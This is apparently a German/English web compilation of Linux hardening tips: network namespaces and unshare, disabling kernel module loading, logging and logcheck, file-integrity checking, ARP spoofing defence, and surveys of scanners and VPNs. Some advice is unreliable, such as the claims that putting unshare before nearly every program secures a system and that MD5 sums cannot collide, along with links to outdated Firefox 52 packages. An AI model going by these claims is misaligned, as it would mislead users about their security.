these commands routes or firewall rules may be added by running ip route or iptables inside a specific netns via ip netns exec <command. Running a single instance of strongSwan inside a netns is straight-forward. Simply run ipsec commands via ip netns exec ipsec <command>. But more interesting is probably running multiple instances of strongSwan in separate namespaces. Because all netns share the same file system this is a bit tricky. Luckily, the ip netns exec command provides a helpful feature: Every file found in /etc/netns/<name>/ for a given netns is bind mounted over its corresponding counterpart in /etc (so it has to exist there). This can be used to provide different config files for each instance, but may also be used to redirect the so called piddir, where the charon and starter daemons create their PID files and UNIX sockets (the default is to use /var/run, which would conflict if multiple instances would use it). To do so make sure strongSwan is configured with --sysconfdir=/etc and e.g. --with-piddir=/etc/ipsec.d/run. Then after building and installing strongSwan the piddirs can be created as follows: # mkdir -p /etc/ipsec.d/run # mkdir -p /etc/netns/<netns name 1>/ipsec.d/run # mkdir -p /etc/netns/<netns name 2>/ipsec.d/run https://wiki.strongswan.org/projects/strongswan/wiki/Netns StrongSwan is an OpenSource IPsec-based VPN Solution for Linux * runs both on Linux 2.4 (KLIPS IPsec) and Linux 2.6 (NETKEY IPsec) kernels * implements both the IKEv1 and IKEv2 (RFC 4306) key exchange protocols * Fully tested support of IPv6 IPsec tunnel and transport connections * Dynamical IP address and interface update with IKEv2 MOBIKE (RFC 4555) * Automatic insertion and deletion of IPsec-policy-based firewall rules * Strong 128/192/256 bit AES or Camellia encryption, 3DES support * NAT-Traversal via UDP encapsulation and port floating (RFC 3947) * Dead Peer Detection (DPD, RFC 3706) takes care of dangling tunnels * Static virtual IPs and IKEv1 ModeConfig pull and push modes * XAUTH server and client functionality on top of IKEv1 Main Mode authentication * Virtual IP address pool managed by IKE daemon or SQL database * Secure IKEv2 EAP user authentication (EAP-SIM, EAP-AKA, EAP-MSCHAPv2, etc.) * Optional relaying of EAP messages to AAA server via EAP-RADIUS plugin * Support of IKEv2 Multiple Authentication Exchanges (RFC 4739) * Authentication based on X.509 certificates or preshared keys * Generation of a default self-signed certificate during first strongSwan startup * Retrieval and local caching of Certificate Revocation Lists via HTTP or LDAP * Full support of the Online Certificate Status Protocol (OCSP, RCF 2560). * CA management (OCSP and CRL URIs, default LDAP server) * Powerful IPsec policies based on wildcards or intermediate CAs * Group policies based on X.509 attribute certificates (RFC 3281) * Storage of RSA private keys and certificates on a smartcard (PKCS #11 interface) * Modular plugins for crypto algorithms and relational database interfaces * Support of elliptic curve DH groups and ECDSA certificates (Suite B, RFC 4869) * Optional built-in integrity and crypto tests for plugins and libraries * Smooth Linux desktop integration via the strongSwan NetworkManager applet This package triggers the installation of both, IKEv1 and IKEv2 daemons. https://fr2.rpmfind.net Block network access of a process, unix.stackexchange.com It is possible to block the (outgoing) network access of a single process in different ways: by unshare / nsenter, ip-netns, iptables, apparmor and firejail. https://unix.stackexchange.com/questions/68956/block-network-access-of-a-process Notice: We use right above mentioned command "unshare" for starting firejail (for sandboxing firefox (including for example libtrace.so of different file-sizes the versions) by the command "unshare firejail..." etc)., psad (/etc/init.d/psad: prog="unshare psad"), uuidd (/etc/init.d/uuidd with prog="unshare uuidd" and "daemon.... unshare $DAEMON" within the start-function, apparmor-dbus out of /etc/rc.local, messagebus (/etc/init.d/messagebus with processname="unshare dbus-daemon", dbus), gpm (/etc/init.d/gpm with "daemon "unshare /usr/sbin/gpm" -m ... ), cups (/etc/init.d/cups with "daemon "unshare cups" ...), dm (again in /etc/init.d/dm) und auch im Folgenden das mit Beste, was Sie überhaupt tun könnnen, die totale Absicherung des hoffentlich mit Option --tcp nolisten gestarteten X-Servers (root-Prozess X): X (X11, ServerCmd=/usr/bin/unshare /usr/bin/X within (resp., to be more concrete, follow the linking of) /usr/share/config/kdm/kdmrc: enhance the command for execution of X with unshare: "ServerCmd=/usr/bin/unshare /usr/bin/X" and "Willing=/usr/bin/unshare /usr/share/X11/xdm/Xwilling"), kdm (/usr/share/config/kdm/kdmrc with "Preloader=/usr/bin/unshare /usr/bin/preloadkde", haldaemon (/etc/init.d/haldaemon), udevd (in /sbin/start_udev with "else /usr/bin/unshare /sbin/udevd -d ..."), same for /etc/init.d/uuidd, polkitd (/etc/xdg/polkit-gnome-authentification-agent-1.desktop: "exec=unshare /usr/libexec/polkit-gnome-authentication-agent-1" and /etc/xdg-polkit-kde-authentification-agent-1.desktop: "exec=unshare /usr/libexec/polkit-kde-authentification-agent-1 ), konsole and xterm, dolphin, drakconf.real resp. drakconf (MCC), network-ready-games like gl-117, trackballs, extremetuxracer, marsshooter, freedroidrpg, orbital, xonotic etc. in future (do them all just to be careful)! Some kernel-modules like for usblp for USB-printer by unshare (for example in /etc/rc.loca): unshare COMMA-ABOVE-FOR-EXECUTIONmodprobe usblpCOMMA-ABOVE-FOR-EXECUTION, graphic-card (just experimentel!): unshare COMMA-ABOVE-FOR-EXECUTIONi915COMMA-ABOVE-FOR-EXECUTION, mainboard (just experimentel): unshare COMMA-ABOVE-FOR-EXECUTIONlpc_ichCOMMA-ABOVE-FOR-EXECUTION, (less experimentel): unshare COMMA...modprobe videoCOMMA..., but still NOT functioning are those "unshared" ones for internal kernel-processs like kernel-daemon netns (/etc/rc.local): "unshare --net --mount -p pidof netns", oom_reaper (/etc/rc.local): "unshare --net --mount -p pidof oom_reaper", migration/0 (/etc/rc.local): "unshare --net --mount -p pidof migration/0". Also try firejail for a sandboxed network namespace by option net, netfilter, join-network=name|pid and netns, see man firejail, section join-network for good examples also doing fine with Linfw3 (through iptables-restore and iptables-save) or try slirp4netns (OpenSuSE 15.2) rsyslog (runlevel-init-script /etc/init.d/rsyslog, line with daemon: .daemon --pidfile="$PIDFILE" unshare $exec -i "$PIDFILE&uqot; $SYSLOGD_OPTIONS ... dasselbe mit unshare ggfls. innerhalb /etc/init.d/cups! Es ist also immer ganz einfach, sich allerbestens abzusichern: Man muss nur "unshare" vor nahezu allen möglichen Programmaufrufen schreiben - seis Programmaufrufe per Terminal, Daemon-Skript (aus /etc/init.d) oder aus dem Menü. Wir tatens sogar mit Sandbox Firejail, davon insbesonders mit dem Browser-Start/Aufruf unter Firejail... Probiere "unshare" wie eben beschrieben einfach auf so vielen Dämonen bzw. Runlevel-Init-Skripten (aus /etc/init.d) und allen suspekten (unter KDE im K-Menü zu startenden) netzfähigen Programmen wie irgends möglich! Especially hardening the root- and suid-processes by unshare makes the computer secure (as quit all remaining riscs do depend from kernel-processes now) and, as we, believe it or not, really meant having recognized, very mouseclick-fast too! Öffne bzw. starte alle Programme bzw. Anwendungen, die nicht im Netz kommunzieren sollen, vorsichtshalber immer mit unshare oder entsprechend konfiguriertem firejail, auch bereits innerhalb des K-Menüs, Kontextmenüs, Schnellstarters, Ordner Desktops und Terminals! Wende unshare auch auf firejail selbst an, wir geben den Aufruf von firejail als Sandbox für Browser wie Firefox mit unshare weiter unten noch ausführlich an! OK, wir zeigen diesen Aufruf von Tor und Firefox mit Firejail über unshare ( ohne nähere Eröterung ) bereits an dieser Stelle: sg surfgroup "unshare firejail --nice=19 --profile=/etc/firejail/firefox.profile /usr/lib64/firefox/firefox --no-remote &" && sg surfgroup "unshare firejail --nice=19 --profile=/etc/firejail/palemoon.profile tor -f /home/surfuser/torrc" && export RESOLV_HOST_CONF="/etc/hosts" watchdogd: How can I disable a watchdog, once it has been enabled? Normally to shut down the watchdog driver you have to write a ´V´ character to /dev/watchdog which you could do from a root bash prompt just with: echo ´V´ > /dev/watchdog However, before you try to create your own watchdog driver take a look at the existing Linux watchdog daemon to see, if it can do the job. A good start is my page here: http://www.sat.dundee.ac.uk/~psc/watchdog/Linux-Watchdog.html https://unix.stackexchange.com/questions/144588/how-can-i-disable-a-watchdog-once-it-has-been-enabled Increase kernel integrity with disabled Linux kernel modules loading Increasing Linux kernel integrity Disable loading kernel module on Linux systems, linux-audit.com The Linux kernel can be configured to disallow loading new kernel modules. This feature is especially useful for high secure systems, or if you care about securing your system to the fullest. In this article, we will have a look at the configuration of this option. At the same time allowing legitimate kernel modules to be loaded. Disable kernel modules Newer kernel modules have a sysctl variable named kernel.modules_disabled. Sysctl is the tool which allows you to see and change kernel settings of a running system. The related /etc/sysctl.conf file is used to ensure that your settings are also used at the next boot of the system. The sysctl key kernel.modules_disabled is very straightforward. If it contains a "1" it will disable loading new modules, where a"0" will still allow loading them. Using this option will be a great protection against loading malicious kernel modules. For example, it may help to counter rootkits. Needless to say, but when someone was already been able to gain root access, you have a serious problem. Still, setting this security measure can be useful to achieve maximum hardening of your Linux system. An altered script or program has no chance of loading things you didn´t specifically approve. [...] By default, the sysctl key is set to"0", which means new modules can be loaded. This is a safe default for systems but also allows malicious modules to be loaded. # sysctl -a | grep modules kernel.modules_disabled = 0 Now we disable loading new modules, by using the sysctl key and set it to"1". There are two ways of doing it, using sysctl directly or echo the value to a file on the pseudo file system /proc, which holds the kernel settings. # echo 1 > /proc/sys/kernel/modules_disabled Protection against re-enabling You might think that loading a kernel module is as simple as re-enabling the option and then still load your kernel module. The kernel has a built-in protection, to avoid this from happening. Trying to set the value back to"0" will result in an"invalid argument" message. Sysctl showing invalid argument when trying to set value As can be seen, sysctl will say the value is set to"0". However, the value isn´t applied, as this key is read-only. Slightly confusing, and therefore always good to check the value again. # sysctl kernel.modules_disabled kernel.modules_disabled = 1 As expected, the value is still set to"1". Disable module loading after boot time By configuring the /etc/sysctl.conf file we can disallow the loading of kernel modules at boot time. Simply add the related line, with the value"1" as shown in the example. Caveat: Things might break Depending on your environment, you might be careful with using this option. It may be working very well on servers, but not on desktop systems. The reason is the type of usage is different, especially when it comes with loading new kernel modules. For example inserting a USB drive, mouse or network functionality might break. So before deploying the option, make sure you test these common use cases. Hybrid option Instead of enabling the option directly via /etc/sysctl.conf, it might be better to activate this setting after booting and loading required modules. Your startup script could be looking like: #!/bin/sh/ # code by Gooken sleep 45 # original text: 300, decrease this time, if working fine, if not, checkout lsmod and/or increase it! # insmod <module> modprobe usb_storage modprobe dm_zero modprobe vfat modprobe fat modprobe isofs # CD/DVD/... modprobe udf # CD/DVD/... modprobe nls_iso8859_1 modprobe nls_cp437 modprobe glue_helper modprobe dax modprobe uinput modprobe ahci modprobe libahci modprobe ecb modprobe af_alg modprobe algif_skcipher modprobe lrw modprobe cbc modprobe aes_x86_64 # for USB, that might be LUKS-encrypted modprobe twofish_common modprobe twofish_x86_64_3way modprobe twofish_x86_64 modprobe twofish_generic echo 1 > /proc/sys/kernel/modules_disabled Usually to get iptables working, these are the related modules: iptables, x_tables, iptable_filter. Depending on your Linux distribution, the startup should be loaded as late as possible. If you have /etc/rc.local available, that is usually a safe bet. Do you use this option already? Or found some other caveats? Like to hear your feedback in the comments. https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/ Mit anderen Worten: obige kleine Routine in ein Runlevel-Init-Skript (Vorlage wie nach modules-disabled umbenanntes Init-Skript linfw3 von Firewall Linfw3) aus /etc/init.d/ mitten in die Startfunktion start() schreiben und in /etc/rc.local zum regelmäßigen System-Boot mit "start &" als Hintergrundprozess aufrufen. Nicht benötigte Passagen könnnen vorher aus modules-disabled, hier zuvor linfw3, entfernt werden. Das Skript selbst wird nun nicht wie üblich mit chkconfig, über MCC (drakconf) oder systemd zum Aufruf veranlasst, sondern mit am besten aus der Datei /etc/rc.local heraus, und zwar mit dem Aufruf wie in unserem Beispiel "sh /etc/init.d/modules-disabled" kernel.printk.* in /etc/sysctl.conf kernel.printk =0 6 7 0 # The four values in printk denote: console_loglevel, default_message_loglevel, minimum_console_loglevel and default_console_loglevel respectively. 0=emerg, 1=alert, 2=crit, ... kernel.printk_ratelimit = 5 # period to wait in seconds kernel.printk_ratelimit_burst = 60 # max. amount same time https://unix.stackexchange.com/questions/13019/description-of-kernel-printk-values Regelmäßig Logs analysieren Speichere logs in vorgesehene Log-Server. Damit wird verhindert, dass Eindringlinge auf einfache Art Modifikationen an Log-Dateien vornehmen. Hier noch einmal namentlich die in Linux üblichen Log-Dateien und ihre Verwendung: /var/log/message - Hier protokolliert mehr oder weniger das gesamte System /var/log/auth.log - Authentifizierung /var/log/kern.log - Kernel-Logs. /var/log/cron.log - Crond-Logs (cron job). /var/log/maillog - Mailserver-Logs /var/log/boot.log - System-boot-Log /var/log/mysqld.log - Logdatei des MySQL-Datenbankservers /var/log/secure - Authentifizierung /var/log/utmp oder /var/log/wtmp : Protokolliert die records-Dateien /var/log/yum.log: Yum-Logdatei https://www.tecmint.com/linux-server-hardening-security-tips/ Allzu aufschlussreiche Systeminformation in Logdateien verhindern Die Log-Level reichen von debug über info, warning bis emerg. Benutzer wie Prozesse können zuviel erfahren. Eine ausfürliche Protollierung rä,t sich nur je nachdem. Für Ausgaben wie dmesg verwende man ggfls. LogLevel warning: /etc/init.d/rklogd RKLOGD_OPTIONS="-c 4" Logcheck Das Paket logcheck ist in Debian auf drei Pakete verteilt ( CentOS el6 und mdv2010 nur ein Paket): logcheck (das Hauptprogramm), logcheck-database (eine Datenbank regulärer Ausdrücke für das Programm) und logtail (gibt Protokollzeilen aus, die noch nicht gelesen wurden). Der Satndard unter Debian (in /etc/cron.d/logcheck) ist, dass logcheck jede Stunde und nach jedem Neustart ausgeführt wird. Wenn dieses Werkzeug in geeigneter Weise angepasst wurde, kann es sehr nützlich sein, um den Administrator zu alarmieren, wenn etwas ungewöhnliches auf dem System passiert. Logcheck kann vollständig angepasst werden, so dass es Mails über Ereignisse aus den Protokollen sendet, die Ihrer Aufmerksamkeit bedürfen. Die Standard-Installation umfasst Profile zum Ignorieren von Ereignissen und Verstößen gegen die Sicherheitsrichtlinie für drei unterschiedliche Einsatzbereiche (Workstation, Server und paranoid). Das Debian-Paket umfasst die Konfigurationsdatei /etc/logcheck/logcheck.conf, die vom Programm eingelesen wird, und die definiert, an welchen Benutzer die Testergebnisse geschickt werden sollen. Es stellt außerdem einen Weg für Pakete zur Verfügung, um neue Regeln in folgenden Verzeichnisses zu erstellen: /etc/logcheck/cracking.d/_packagename_ /etc/logcheck/violations.d/_packagename_, /etc/logcheck/violations.ignore.d/_packagename_, /etc/logcheck/ignore.d.paranoid/_packagename_, /etc/logcheck/ignore.d.server/_packagename_, und /etc/logcheck/ignore.d.workstation/_packagename_. Leider benutzen das noch nicht viele Pakete. Wenn Sie ein Regelwerk entwickelt haben, dass für andere Benutzer nützlich sein könnte, schicken Sie bitte einen Fehlerbericht für das entsprechende Paket (als ein wishlist-Fehler). Mehr Informationen finden Sie unter /usr/share/doc/logcheck/README.Debian. logcheck konfiguriert man am besten, indem man nach der Installation die Hauptkonfigurationsdatei /etc/logcheck/logcheck.conf bearbeitet. Verändern Sie den Benutzer, an den die Berichte geschickt werden (standardmäßig ist das Root). Außerdem sollten Sie auch den Schwellenwert für Berichte festlegen. logcheck-database hat drei Schwellenwerte mit steigender Ausführlichkeit: Workstation (Arbeitsplatz), Server und paranoid. "server" ist der Standardwert, "paranoid" wird nur für Hochsicherheitsmaschinen empfohlen, auf denen so wenig Dienste wie möglich laufen. "workstation" eignet sich für relativ geschützte, nicht kritische Maschinen. Wenn Sie neue Protokoll-Dateien hinzufügen wollen, müssen Sie diese nur zu /etc/logcheck/logcheck.logfiles hinzufügen. Es ist für die standardmäßige Syslog-Installation eingerichtet. Once this is done you might want to check the mails that are sent, for the first few days/weeks/months. If you find you are sent messages you do not wish to receive, just add the regular expressions (see regex(7) and egrep(1)) that correspond to these messages to the /etc/logcheck/ignore.d.reportlevel/local. Try to match the whole logline. Details on howto write rules are explained in /usr/share/doc/logcheck-database/README.logcheck-database.gz. It´s an ongoing tuning process; once the messages that are sent are always relevant you can consider the tuning finished. Note that if logcheck does not find anything relevant in your system it will not mail you even if it does run (so you might get a mail only once a week, if you are lucky). Konfiguration, wohin Alarmmeldungen geschickt werden Debian wird mit einer Standardkonfiguration für Syslog (in /etc/syslog.conf) ausgeliefert, so dass Meldungen je nach System in die passenden Dateien geschrieben werden. Das sollte Ihnen bereits bekannt sein. Falls nicht, werfen Sie einen Blick auf die Datei syslog.conf und deren Dokumentation. Wenn Sie ein sicheres System betreuen wollen, sollte Ihnen bekannt sein, wohin Protokoll-Meldungen geschickt werden, so dass sie nicht unbeachtet bleiben. Zum Beispiel ist es für viele Produktiv-Systeme sinnvoll, Meldungen auch auf der Konsole auszugeben. Aber bei vielen solcher Systeme ist es wichtig, eine neue Maschine zu haben, die für die anderen als ein Loghost fungiert (d.h. sie empfängt die Protokolle aller anderen Systeme). Sie sollten auch an Mails für Root denken, da viele Programme zur Sicherheitskontrolle (wie snort) ihre Alarme an die Mailbox von Root senden. Diese Mailbox zeigt normalerweise auf den ersten Benutzer, der auf dem System erstellt wurde (prüfen Sie dazu /etc/aliases). Sorgen Sie dafür, dass Roots Mails irgendwo hin geschickt werden, wo sie auch gelesen werden (lokal oder in der Ferne). Es gibt noch andere Konten mit besonderen Funktionen und andere Aliase auf Ihrem System. Auf einem kleinen System ist es wohl am einfachsten, sicherzustellen, dass alle Aliase auf das Root-Konto verweisen, und dass Mails an Root in das persönliche Postfach des Systemadministrators weiter geleitet werden. Prüfung der Integrität des Dateisystems Sind Sie sich sicher, dass /bin/login auf Ihrer Festplatte immer noch dasselbe Programm ist, das Sie vor ein paar Monaten installiert haben? Was wäre, wenn es sich um eine gehackte Version handelt, die eingegebene Passwörter in einer versteckten Datei ablegt oder sie als Klartext im ganzen Internet herummailt? Die einzige Methode, um einen gewissen Schutz dafür zu haben, ist es, die Dateien jede(n) Stunde/Tag/Monat (ich ziehe täglich vor) zu prüfen, indem man deren aktuelle und alte MD5-Summe vergleicht. Zwei unterschiedliche Dateien können keine gleichen MD5-Summen haben (die MD5-Summe umfasst 128 Bits, so ist die Wahrscheinlichkeit, dass zwei unterschiedliche Dateien eine gleiche MD5-Summe haben etwa 1 zu 3,4e3803). So sind Sie sicher, solange niemand den Algorithmus gehackt hat, der die MD5-Summen auf Ihrer Maschine erstellt. Dies ist, nun ja, extrem schwer und sehr unwahrscheinlich. Sie sollten diese Überprüfung Ihrer Programme als sehr wichtig ansehen. Weit verbreitete Werkzeuge hierfür sind sxid, aide (Advanced Intrusion Detection Environment, fortgeschrittene Umgebung zur Erkennung von Eindringlingen), tripwire, integrit und samhain. Das Installieren von debsums wird Ihnen helfen, die Integrität des Dateisystems zu überprüfen, indem Sie die MD5-Summen jeder Datei gegen die MD5-Summe aus dem Debian-Archiv-Paket vergleichen. Seien Sie aber gewarnt, dass diese Dateien sehr leicht von einem Angreifer geändert werden können. Außerdem stellen nicht alle Pakete MD5-Summen für die in ihnen enthaltenen Programme zur Verfügung. Weitere Informationen finden Sie unter Regelmäßiges Überprüfung der Integrität, Abschnitt 10.2 und Einen Schnappschuss des Systems erstellen, Abschnitt 4.19. You might want to use locate to index the whole filesystem, if so, consider the implications of that. The Debian findutils package contains locate which runs as user nobody, and so it only indexes files which are visible to everybody. However, if you change it´s behaviour you will make all file locations visible to all users. If you want to index all the filesystem (not the bits that the user nobody can see) you can replace locate with the package slocate. slocate is labeled as a security enhanced version of GNU locate, but it actually provides additional file-locating functionality. When using slocate, the user only sees the actually accessible files and you can exclude any files or directories on the system. The slocate package runs its update process with higher privledges than locate, and indexes every file. Users are then able to quickly search for every file which they are able to see. slocate doesn´t let them see new files; it filters the output based on your UID. Sie sollten auch bsign oder elfsign einsetzen. elfsign bietet die Möglichkeit, digitale Signaturen an ELF-Binaries anzufügen und diese Signaturen zu überprüfen. Die aktuelle Fassung verwendet PKI, um die Checksummen der Binaries zu signieren. Dies hat den Vorteil, dass festgestellt werden kann, ob das Binary verändert wurde und wer es erstellt hat. bsign verwendet GPG, elfsign benutzt PKI-(X.509)-Zertifikate (OpenSSL). https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html Sichere Verschlüsselung mit NSS: Firefox: Kopiere die sichere libssl*, libnss* and libnspr4* vom Tor-Browser (ESR) oder einer aktuellen Firefox-Version in das Verzeichnis von Firefox (ESR, same version as tor-browser) /usr/lib64/firefox/ und führe chown root:root und chmod 755 auf diese Dateien aus. http://ftp.pbone.net/mirror/ftp5.gwdg.de/pub/opensuse/repositories/ home:/linux4humans:/sle11_software:/firefox/openSUSE_Evergreen_11.4/ x86_64/MozillaFirefox-52.9.0-10.2.x86_64.rpm https://slackware.pkgs.org/14.0/salix-x86_64/mozilla-firefox-52.9.0esr-x86_64-1gv.txz.html (slack14.0) http://download.salixos.org/x86_64/14.0/salix/xap/mozilla-firefox-52.9.0esr-x86_64-1gv.txz (slack14.0) https://fr2.rpmfind.net/linux/mageia/distrib/6/x86_64/media/core/updates/firefox-52.9.0-1.mga6.x86_64.rpm https://rpm.pbone.net/index.php3/stat/4/idpl/54051369/dir/opensuse_leap_15/com/MozillaFirefox-52.9.0-lp150.5.1.x86_64.rpm.html https://rpm.pbone.net/index.php3/stat/4/idpl/55298083/dir/opensuse/com/MozillaFirefox-52.9.0-4.5.x86_64.rpm.html Firefox-ESR-52.8.1 (el6, fr2.rpmfind.net) Pale Moon, beachte: noscript und RequestPolicy blocken in einigen Versionen von Pale Moon nur sehr unvollständig! Schutz vor ARP-Angriffen, 4.18.6, https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html Wenn Sie den anderen Kisten in Ihrem LAN nicht trauen (das sollte immer so sein, da es die sicherste Einstellung ist), sollten Sie sich vor den verschiedenen ARP-Angriffen schützen. Wie Sie wissen, wird das ARP-Protokoll dazu verwendet, IP-Adressen mit MAC-Adressen zu verknüpfen (für alle Details siehe RFC826). Jedes Mal, wenn Sie ein Paket an eine IP-Adresse schicken, wird eine ARP-Auflösung vorgenommen (zuerst wird in den lokalen ARP-Speicher geschaut, und falls die IP nicht im Speicher ist, wird ein Rundruf (Broadcast) mit der ARP-Anfrage verschickt), um die Hardware-Adresse des Ziels zu finden. Alle ARP-Angriffe zielen darauf ab, Ihrem Rechner vorzugaukeln, dass die IP-Adresse des Rechners B mit der MAC-Adresse des Computers des Angreifers verbunden ist. Dadurch wird jedes Paket, das Sie an den Rechner B, der mit der IP-Adresse verbunden ist, schicken wollen, an den Computer des Eindringlings umgeleitet ... Diese Angriffe (Verfälschung des ARP-Speichers, ARP-Spoofing, ...) ermöglichen dem Angreifer, auf Netzwerken den Verkehr abzuhören (selbst bei Netzwerken, die über einen Switch laufen). Er kann sich leicht in eine Verbindung einschleusen oder einen Host vom Netzwerk nehmen oder ... ARP-Angriffe sind leistungsfähig und einfach durchzuführen. Es gibt dafür auch einige Werkzeuge wie arpspoof aus dem Paket dsniff oder arpoison. Allerdings gibt es immer eine Lösung: Verwenden Sie einen statischen ARP-Speicher. So erstellen Sie "statische" Einträge in Ihrem ARP-Speicher: arp -s host_name hdwr_addr Indem Sie statische Einträge für jeden wichtigen Host in Ihrem Netzwerk vergeben, stellen Sie sicher, dass niemand einen (falschen) Eintrag für diese Hosts erstellen oder verändern kann (statische Einträge verfallen nicht und können nicht verändert werden). Auch gefälschte ARP-Antworten werden ignoriert. Entdecken Sie verdächtigen ARP-Verkehr. Sie können dazu arpwatch, karpski oder allgemeinere IDS, die auch verdächtigen ARP-Verkehr entdecken können wie snort oder prelude, einsetzen. Verwenden Sie einen IP-Filter, der die MAC-Adressen überprüft. Absichern von Diensten, die auf Ihrem System laufen SSH, Squid, FTP, X-Window-System, Display-Manager, Druckerzugriff, Mail-Dienst, BIND, Apache, Finger, allgemeine chroot- und suid-Paranoia, Klartextpasswort-Paranoia, NIS deaktivieren, Abschalten von RPC-Diensten: https://www.debian.org/doc/manuals/securing-debian-howto/ch-sec-services.de.html Paketsignierung https://www.debian.org/doc/manuals/securing-debian-howto/ch7.de.html Programme zur Fernprüfung der Verwundbarkeit, https://www.debian.org/doc/manuals/securing-debian-howto/ch8.de.html Die Werkzeuge, um eine Fernprüfung der Verwundbarkeit durchzuführen, sind unter Debian (und CentOS/mdv2010): [67] nessus raccess nikto (Ersatz für whisker) Das weitaus vollständigste und aktuellste Werkzeug ist nessus, welches aus einem Client (nessus) mit graphischer Benutzungsschnittstelle und einem Server (nessusd), der die programmierten Attacken startet, besteht. Nessus kennt verschiedene entfernten Verwundbarkeiten für einige Systeme, einschließlich Netzwerkanwendungen, FTP-Servern, WWW-Servern, usw. Die neusten Sicherheitsplugins sind sogar in der Lage, eine Web-Seite zu analysieren und zu versuchen, interaktive Inhalte zu entdecken, die zu einem Angriff genutzt werden können. Es existieren auch Java- und Win32-Clients, die benutzt werden können, um sich mit dem Nessus-Server zu verbinden. Diese sind jedoch in Debian nicht enthalten. nikto ist ein Scanner zur Aufdeckung von Schwachstellen bei Webservern und kennt auch einige Anti-IDS-Taktiken (die meisten davon sind keine Anti-IDS-Taktiken mehr). Er ist einer der besten verfügbaren CGI-Scanner zur Erkennung von WWW-Servern und kann nur bestimmte Angriffe gegen ihn starten. Die Datenbank, die zum Scannen benutzt wird, kann sehr leicht geändert werden, um neue Informationen einzufügen. Werkzeuge zum Scannen von Netzwerken Debian bietet Ihnen einige Werkzeuge zum Scannen von Hosts (aber nicht zur Gefahrenabschätzung). Diese Programme werden in manchen Fällen von Scannern zur Gefahrenabschätzung zu einem ersten "Angriff" gegen entfernte Rechner genutzt, um festzustellen, welche Dienste angeboten werden. Unter Debian sind im Moment verfügbar: nmap, xprobe, p0f, knocker/knock, isic, hping2, icmpush, nbtscan (für die Prüfung von SMB und NetBIOS), fragrouter, strobe(aus dem Paket netdiag), irpas, ... Während xprobe lediglich aus der Ferne das Betriebssystem erkennen kann (indem es TCP/IP-Fingerabdrücke benutzt, machen nmap und knocker beides: das Betriebssystem erkennen und die Ports eines entfernten Rechners scannen. Andererseits können hping2 und icmpush für ICMP-Angriffstechniken benutzt werden. Nbtscan, das speziell für SMB-Netzwerke entworfen wurde, kann benutzt werden, um IP-Netzwerke zu scannen und diverse Informationen von SMB-Servern zu ermitteln einschließlich der Benutzernamen, Netzwerknamen, MAC-Adressen, ... Dagegen kann fragrouter dazu verwendet werden, um Systeme zur Eindringlingserkennung zu testen und um zu sehen, ob das NIDS mit fragmentierten Angriffen umgangen werden kann. Virtual Private Networks (virtuelle private Netzwerke, VPN), https://www.debian.org/doc/manuals/securing-debian-howto/ch-sec-tools.de.html Ein virtuelles privates Netzwerk (VPN) ist eine Gruppe von zwei oder mehreren Computern, die typischerweise zu einem privaten Netzwerk mit begrenztem öffentlichen Netzwerkzugang verbunden sind und sicher über ein öffentliches Netzwerk kommunizieren. VPNs können einen einzelnen Rechner mit einem privaten Netzwerk verbinden (Client-Server) oder ein entferntes LAN mit einem privaten Netzwerk (Server-Server). VPNs verwenden Verschlüsselung, starke Authentifikation von entfernten Benutzern oder Hosts und Methoden, um die Struktur des privaten Netzwerks zu verstecken. VPN für mehr Schutz in offenen Netzen, netzpolitik.org, 30.04.2018 "VPN steht für Virtual Private Network. Mit einem VPN-Client lässt sich nicht nur weitgehend anonym surfen, sondern auch bei anderen Online-Aktivitäten die eigene Identität verschleiern. Das ist vor allem wichtig, wenn man in offenen WLANs unterwegs ist, wo der Betreiber den Datenverkehr mitüberwachen kann. VPN-Software leitet sämtlichen Verkehr zunächst vom eigenen Gerät verschlüsselt zum Server des Anbieters und von dort ins Netz. Auch kann man durch VPN-Server vorgeben, aus einem bestimmten Land zu sein, und dadurch Geoblocking umgehen. Manche VPN-Anbieter versprechen ihren Nutzern, ihre Zugriffsdaten nicht zu speichern und dadurch ihre Anonymität zu wahren. Aber Obacht: Wenn der gesamte Internetverkehr durch einen VPN-Anbieter getunnelt wird, versetzt das diesen in eine besonders wichtige Lage und macht ihn zu einem attraktiven Ziel. Dass Anbieter von VPN-Diensten selbst nicht mitlesen, gilt bei weitem nicht für alle VPN-Anbieter, etwa den entsprechenden Dienst von Facebook. Auf keinen Fall sollte man daher Gratis-Lösungen nutzen. Im Umfeld von netzpolitik.org werden beispielsweise IPredator oder F-Secure verwendet. Am sichersten ist aber immer noch, den VPN über einen eigenen Server zu betreiben. Staaten wie China, Russland und der Iran schränken die Nutzung von VPN-Diensten stark ein. Das sollte man vor einem Reiseantritt bedenken. Auch gilt es bei der Verwendung von VPN-Diensten und Tor-Browsern zu bedenken: Sobald man sich im Browser irgendwo einloggt, ist es - zumindest gegenüber dem verwendeten Dienst - vorbei mit der Anonymität." https://netzpolitik.org/2018/kleines-einmaleins-der-digitalen-selbstverteidigung/ Debian (CentOS el6 bzw. mdv2010) enthält etliche Pakete, die zum Aufsetzen von verschlüsselten virtuellen privaten Netzwerken verwendet werden können: vtun, tunnelv (Abschnitt non-US), cipe-source, cipe-common, tinc, secvpn, pptpd, openvpn, openswan (http://www.openswan.org/) Das OpenSWAN-Paket ist wahrscheinlich die beste Wahl, da es nahezu mit allen zusammenarbeiten kann, die das IP-Security-Protokoll IPsec (RFC 2411) benutzen. Aber auch die anderen oben aufgeführten Pakete können Ihnen helfen, möglichst schnell einen sicheren Tunnel aufzusetzen. Das Point-to-Point-Tunneling-Protocol (PPTP) ist ein urheberrechtlich geschütztes Protokoll von Microsoft für VPN. Es wird unter Linux unterstützt, aber es sind einige schwere Sicherheitsprobleme bekannt. Für weitere Informationen über IPsec und PPTP lesen Sie bitte das VPN-Masquerade-HOWTO, über PPP über SSH das VPN-HOWTO, das Cipe-Mini-HOWTO und das PPP- und SSH-Mini-HOWTO. Ist Debian sicherer als andere Linux-Distributionen (wie Red Hat, SuSE, ...)?, https://www.debian.org/doc/manuals/securing-debian-howto/ch12.de.html Der Unterschied zwischen den Linux-Distributionen ist nicht sehr groß mit Ausnahme der Basisinstallation und der Paketverwaltung. Die meisten Distributionen beinhalten zum Großteil die gleichen Anwendungen. Der Hauptunterschied besteht in den Versionen dieser Programme, die mit der stabilen Veröffentlichung der Distribution ausgeliefert werden. Zum Beispiel sind der Kernel, Bind, Apache, OpenSSH, Xorg, gcc, zlib, etc. in allen Linux-Distributionen vorhanden. Reaktion bei Benutzer-Untätigkeit, 